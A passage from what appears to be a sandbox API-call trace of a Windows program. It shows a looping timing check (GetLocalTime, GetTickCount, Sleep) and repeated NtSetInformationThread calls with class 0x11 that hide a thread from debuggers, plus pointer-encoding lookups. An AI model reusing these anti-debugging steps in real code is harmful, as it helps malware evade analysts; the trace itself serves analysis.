GetTickCount () returned 0x1150629 [0099.354] Sleep (dwMilliseconds=0x3e8) [0100.666] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xa, wMilliseconds=0x358)) [0100.666] GetTickCount () returned 0x1150a1f [0100.666] Sleep (dwMilliseconds=0x3e8) [0108.651] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xb, wMilliseconds=0x366)) [0108.655] GetTickCount () returned 0x1150e15 [0108.655] Sleep (dwMilliseconds=0x3e8) [0109.870] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xc, wMilliseconds=0x383)) [0109.871] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0109.871] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0109.871] GetCurrentThread () returned 0xfffffffe [0109.871] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0109.871] GetTickCount () returned 0x115121b [0109.871] Sleep (dwMilliseconds=0x3e8) [0110.881] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xd, wMilliseconds=0x391)) [0110.881] GetTickCount () returned 0x1151611 [0110.881] Sleep (dwMilliseconds=0x3e8) [0111.896] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xe, wMilliseconds=0x39f)) [0111.896] GetTickCount () returned 0x1151a07 [0111.896] Sleep (dwMilliseconds=0x3e8) [0113.800] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xf, wMilliseconds=0x3bd)) [0113.800] GetTickCount () returned 0x1151e0c [0113.800] Sleep (dwMilliseconds=0x3e8) [0114.858] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x10, wMilliseconds=0x3cb)) [0114.858] GetTickCount () returned 0x1152202 [0114.858] Sleep (dwMilliseconds=0x3e8) [0116.530] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x12, wMilliseconds=0x290)) [0116.530] GetTickCount () returned 0x1152897 [0116.530] Sleep (dwMilliseconds=0x3e8) [0118.388] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x14, wMilliseconds=0x200)) [0118.389] GetTickCount () returned 0x1152fd7 [0118.389] Sleep (dwMilliseconds=0x3e8) [0120.340] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x15, wMilliseconds=0x384)) [0120.340] GetTickCount () returned 0x1153544 [0120.340] Sleep (dwMilliseconds=0x3e8) [0123.305] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x18, wMilliseconds=0x6)) [0123.306] GetTickCount () returned 0x1153d7e [0123.306] Sleep (dwMilliseconds=0x3e8) [0128.157] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x1b, wMilliseconds=0x1a7)) [0128.157] GetTickCount () returned 0x1154ad6 [0128.157] Sleep (dwMilliseconds=0x3e8) [0131.020] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x1e, wMilliseconds=0x4b)) [0131.021] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0131.021] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0131.021] GetCurrentThread () returned 0xfffffffe [0131.022] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0131.022] GetTickCount () returned 0x1155542 [0131.022] Sleep (dwMilliseconds=0x3e8) [0133.814] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x20, wMilliseconds=0x289)) [0133.815] GetTickCount () returned 0x1155f40 [0133.815] Sleep (dwMilliseconds=0x3e8) [0136.400] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x22, wMilliseconds=0x3cd)) [0136.400] GetTickCount () returned 0x1156855 [0136.400] Sleep (dwMilliseconds=0x3e8) [0139.230] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x25, wMilliseconds=0x1f4)) [0139.230] GetTickCount () returned 0x1157234 [0139.230] Sleep (dwMilliseconds=0x3e8) [0141.678] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x27, wMilliseconds=0x3b6)) [0141.678] GetTickCount () returned 0x1157bc5 [0141.678] Sleep (dwMilliseconds=0x3e8) [0144.272] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x2a, wMilliseconds=0x122)) [0144.272] GetTickCount () returned 0x11584e9 [0144.272] Sleep (dwMilliseconds=0x3e8) [0145.384] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x2b, wMilliseconds=0x15e)) [0145.384] GetTickCount () returned 0x115890e [0145.384] Sleep (dwMilliseconds=0x3e8) [0146.943] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x2c, wMilliseconds=0x360)) [0146.943] GetTickCount () returned 0x1158ef7 [0146.943] Sleep (dwMilliseconds=0x3e8) [0148.474] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x2e, wMilliseconds=0x2)) [0148.474] GetTickCount () returned 0x115936a [0148.474] Sleep (dwMilliseconds=0x3e8) [0151.032] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x30, wMilliseconds=0x2e)) [0151.032] GetTickCount () returned 0x1159b66 [0151.032] Sleep (dwMilliseconds=0x3e8) [0153.039] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x31, wMilliseconds=0xd8)) [0153.040] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0153.040] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0153.040] GetCurrentThread () returned 0xfffffffe [0153.040] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0153.040] GetTickCount () returned 0x1159ff8 [0153.040] Sleep (dwMilliseconds=0x3e8) [0154.541] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x32, wMilliseconds=0x2ba)) [0154.541] GetTickCount () returned 0x115a5c2 [0154.541] Sleep (dwMilliseconds=0x3e8) [0156.184] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x33, wMilliseconds=0x326)) [0156.184] GetTickCount () returned 0x115aa15 [0156.184] Sleep (dwMilliseconds=0x3e8) [0157.842] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x35, wMilliseconds=0x13f)) [0157.842] GetTickCount () returned 0x115affe [0157.842] Sleep (dwMilliseconds=0x3e8) [0158.910] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x36, wMilliseconds=0x17c)) [0158.910] GetTickCount () returned 0x115b423 [0158.910] Sleep (dwMilliseconds=0x3e8) [0160.737] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x37, wMilliseconds=0x199)) [0160.737] GetTickCount () returned 0x115b829 [0160.737] Sleep (dwMilliseconds=0x3e8) [0161.827] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x38, wMilliseconds=0x1f5)) [0161.827] GetTickCount () returned 0x115bc6d [0161.828] Sleep (dwMilliseconds=0x3e8) [0165.691] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x39, wMilliseconds=0x2be)) [0165.691] GetTickCount () returned 0x115c11e [0165.691] Sleep (dwMilliseconds=0x3e8) [0166.963] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x3a, wMilliseconds=0x3d6)) [0166.964] GetTickCount () returned 0x115c61d [0166.964] Sleep (dwMilliseconds=0x3e8) [0169.182] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x0, wMilliseconds=0x3d2)) [0169.182] GetTickCount () returned 0x115cdea [0169.182] Sleep (dwMilliseconds=0x3e8) [0171.132] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x2, wMilliseconds=0x56)) [0171.133] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0173.605] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0173.605] GetCurrentThread () returned 0xfffffffe [0173.605] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0173.605] GetTickCount () returned 0x115dbbf [0173.605] Sleep (dwMilliseconds=0x3e8) [0174.772] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x5, wMilliseconds=0x2b2)) [0174.772] GetTickCount () returned 0x115e051 [0174.772] Sleep (dwMilliseconds=0x3e8) [0175.999] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x6, wMilliseconds=0x39a)) [0175.999] GetTickCount () returned 0x115e522 [0175.999] Sleep (dwMilliseconds=0x3e8) [0178.971] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x9, wMilliseconds=0x4b)) [0178.971] GetTickCount () returned 0x115ed8a [0178.971] Sleep (dwMilliseconds=0x3e8) [0180.052] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0xa, wMilliseconds=0xa7)) [0180.052] GetTickCount () returned 0x115f1ce [0180.052] Sleep (dwMilliseconds=0x3e8) [0181.331] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0xb, wMilliseconds=0x1be)) [0181.331] GetTickCount () returned 0x115f6ce [0181.331] Sleep (dwMilliseconds=0x3e8) [0182.690] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0xc, wMilliseconds=0x239)) [0182.690] GetTickCount () returned 0x115fb31 [0182.690] Sleep (dwMilliseconds=0x3e8) [0184.747] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0xe, wMilliseconds=0x265)) [0184.774] GetTickCount () returned 0x116034c [0184.775] Sleep (dwMilliseconds=0x3e8) [0185.902] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0xf, wMilliseconds=0x30f)) [0185.902] GetTickCount () returned 0x11607bf [0185.902] Sleep (dwMilliseconds=0x3e8) [0187.462] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x11, wMilliseconds=0x157)) [0187.462] GetTickCount () returned 0x1160dd7 [0187.462] Sleep (dwMilliseconds=0x3e8) [0188.544] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x12, wMilliseconds=0x1a3)) [0188.546] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0188.547] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0188.547] GetCurrentThread () returned 0xfffffffe [0188.547] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0188.547] GetTickCount () returned 0x116120b [0188.547] Sleep (dwMilliseconds=0x3e8) [0189.690] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x13, wMilliseconds=0x22e)) [0189.690] GetTickCount () returned 0x116167e [0189.690] Sleep (dwMilliseconds=0x3e8) [0190.858] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x14, wMilliseconds=0x2d8)) [0190.858] GetTickCount () returned 0x1161b10 [0190.858] Sleep (dwMilliseconds=0x3e8) [0192.138] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x16, wMilliseconds=0x7)) [0192.138] GetTickCount () returned 0x116200f [0192.138] Sleep (dwMilliseconds=0x3e8) [0193.359] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x17, wMilliseconds=0xe0)) [0193.359] GetTickCount () returned 0x11624d0 [0193.359] Sleep (dwMilliseconds=0x3e8) [0194.560] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x18, wMilliseconds=0x1a9)) [0194.560] GetTickCount () returned 0x1162981 [0194.560] Sleep (dwMilliseconds=0x3e8) [0195.902] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x19, wMilliseconds=0x2ff)) [0195.902] GetTickCount () returned 0x1162ebf [0195.902] Sleep (dwMilliseconds=0x3e8) [0197.052] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x1a, wMilliseconds=0x38a)) [0197.052] GetTickCount () returned 0x1163331 [0197.052] Sleep (dwMilliseconds=0x3e8) [0198.317] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x1c, wMilliseconds=0xa9)) [0198.317] GetTickCount () returned 0x1163821 [0198.317] Sleep (dwMilliseconds=0x3e8) [0199.493] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x1d, wMilliseconds=0x163)) [0199.493] GetTickCount () returned 0x1163cc3 [0199.493] Sleep (dwMilliseconds=0x3e8) [0200.757] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x1e, wMilliseconds=0x25b)) [0200.758] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0200.759] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0200.759] GetCurrentThread () returned 0xfffffffe [0200.759] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0200.759] GetTickCount () returned 0x11641a3 [0200.759] Sleep (dwMilliseconds=0x3e8) [0201.885] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x1f, wMilliseconds=0x2d6)) [0201.885] GetTickCount () returned 0x1164606 [0201.885] Sleep (dwMilliseconds=0x3e8) [0203.125] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x20, wMilliseconds=0x39f)) [0203.125] GetTickCount () returned 0x1164ab7 [0203.125] Sleep (dwMilliseconds=0x3e8) [0204.279] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x22, wMilliseconds=0x52)) [0204.279] GetTickCount () returned 0x1164f39 [0204.279] Sleep (dwMilliseconds=0x3e8) [0205.566] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x23, wMilliseconds=0x159)) [0205.567] GetTickCount () returned 0x1165429 [0205.567] Sleep (dwMilliseconds=0x3e8) [0206.681] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x24, wMilliseconds=0x1d4)) [0206.681] GetTickCount () returned 0x116588c [0206.681] Sleep (dwMilliseconds=0x3e8) [0207.774] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x25, wMilliseconds=0x230)) [0207.774] GetTickCount () returned 0x1165cd0 [0207.774] Sleep (dwMilliseconds=0x3e8) [0208.881] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x26, wMilliseconds=0x29c)) [0208.881] GetTickCount () returned 0x1166124 [0208.881] Sleep (dwMilliseconds=0x3e8) [0209.978] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x27, wMilliseconds=0x2f8)) [0209.978] GetTickCount () returned 0x1166568 [0209.978] Sleep (dwMilliseconds=0x3e8) [0211.049] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x28, wMilliseconds=0x344)) [0211.049] GetTickCount () returned 0x116699c [0211.049] Sleep (dwMilliseconds=0x3e8) [0212.204] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x29, wMilliseconds=0x3df)) [0212.204] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0212.205] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0212.205] GetCurrentThread () returned 0xfffffffe [0212.205] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0212.205] GetTickCount () returned 0x1166e1f [0212.205] Sleep (dwMilliseconds=0x3e8) [0213.342] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x2b, wMilliseconds=0x82)) [0213.342] GetTickCount () returned 0x1167291 [0213.343] Sleep (dwMilliseconds=0x3e8) [0214.537] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x2c, wMilliseconds=0x13b)) [0214.537] GetTickCount () returned 0x1167733 [0214.537] Sleep (dwMilliseconds=0x3e8) [0216.037] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x2d, wMilliseconds=0x32d)) [0216.037] GetTickCount () returned 0x1167d0d [0216.037] Sleep (dwMilliseconds=0x3e8) Thread: id = 4 os_tid = 0xbb8 [0062.067] SysReAllocStringLen (in: pbstr=0x129f6d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x129f6d4*="KERNEL32.DLL") returned 1 [0062.067] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.068] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.070] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0062.070] SysReAllocStringLen (in: pbstr=0x129f6d4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x129f6d4*="KERNEL32.DLL") returned 1 [0062.070] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.070] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.073] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0062.073] SysReAllocStringLen (in: pbstr=0x129f6b0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x129f6b0*="KERNEL32.DLL") returned 1 [0062.073] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.075] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0062.078] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 5 os_tid = 0x9f0 [0062.113] SysReAllocStringLen (in: pbstr=0x558f7ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x558f7ac*="KERNEL32.DLL") returned 1 [0062.113] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.115] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.117] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0062.118] SysReAllocStringLen (in: pbstr=0x558f7ac*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x558f7ac*="KERNEL32.DLL") returned 1 [0062.118] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.118] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.120] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0062.120] SysReAllocStringLen (in: pbstr=0x558f788*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x558f788*="KERNEL32.DLL") returned 1 [0062.120] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0062.121] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.123] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0062.126] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0062.133] GetCurrentThreadId () returned 0x9f0 [0062.133] ResetEvent (hEvent=0xb8) returned 1 [0062.133] GetCurrentThreadId () returned 0x9f0 [0062.133] GetCurrentThreadId () returned 0x9f0 [0062.133] GetCurrentThreadId () returned 0x9f0 [0062.133] ResetEvent (hEvent=0xb8) returned 1 [0062.133] GetCurrentThreadId () 